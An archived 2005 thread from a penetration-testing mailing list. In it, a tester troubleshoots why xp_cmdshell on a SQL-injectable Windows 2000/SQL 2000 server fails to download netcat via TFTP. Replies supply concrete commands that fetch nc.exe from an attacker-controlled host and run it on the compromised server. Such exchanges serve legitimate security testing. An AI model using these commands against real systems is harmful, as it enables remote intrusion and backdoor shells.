Re: TFTP and XP_CMDSHELL - Weird

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Thu Jun 23 2005 - 10:04:15 EDT

• Next message: Ron: "Re: Connecting to different services with source port 53"
• Previous message: nick johnson: "Re: Connecting to different services with source port 53"
• In reply to: Frederic Charpentier: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Reply: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

No luck.
Tried in every folder I could imagine.
Besides I am able to create a file through "xp_cmdshell 'echo a > c:\a.txt'
" so I have write permissions in C.

I think the problem is the tftp client. Does anyone know if MS has fixed it
in anyway not to allow downloads from low-privileged users?? or something
like that??

Thanks, Andy.

>From: Frederic Charpentier <fcharpen@xmcopartners.com>
>To: Jose Selvi <jselvi@s2grupo.com>
>CC: Andres Molinetti <andymolinetti@hotmail.com>,
>pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 15:48:27 +0200
>
>HI jose,
>
>try like that
>
>xp_cmdshell 'tftp -i yourHost GET nc.exe'
>xp_cmdshell 'nc.exe'
>
>and you will work in the current directory (c:\windows\system32).
>
>
>Jose Selvi wrote:
>>Maybe sqlsvc user can't write in c:\ folder. Can He?.
>>
>>The first call to tftp you are using Administrator user, who of course can
>>write in c:\ .
>>
>>Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
>>It must work.
>>
>>Andres Molinetti escribió:
>>
>>>Hi, I am testing a Web App vulnerable to SQL Injection.
>>>It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
>>>
>>>While trying to use the xp_cmdshell to upload nc.exe from my tftpd server
>>>to the Webserver, I experienced some problems.
>>>
>>>I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
>>>
>>>As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost
>>>GET nc.exe c:\nc.exe". File is downloaded.
>>>
>>>When I tried it through the wep app it failed. I tried directly through
>>>SQL Query Analizer and it also failed.
>>>
>>>SQL is running as a low priviledged account (sqlsvc)...
>>>
>>>Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
>>>nc.exe c:\nc.exe" and IT FAILED.!!
>>>
>>>I can easily deduce that the problem is the TFTP client (tftp.exe)...
>>>
>>>Any Ideas?
>>
>>
>
>--
>Frederic Charpentier - Xmco Partners
>Security Consulting / Pentest
>web : http://www.xmcopartners.com
>

_________________________________________________________________
Descarga gratis la Barra de Herramientas de MSN
http://www.msn.es/usuario/busqueda/barra?XAPID=2031&DI=1055&SU=http%3A//www.hotmail.com&HL=LINKTAG1OPENINGTEXT_MSNBH

• Next message: Ron: "Re: Connecting to different services with source port 53"
• Previous message: nick johnson: "Re: Connecting to different services with source port 53"
• In reply to: Frederic Charpentier: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Reply: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT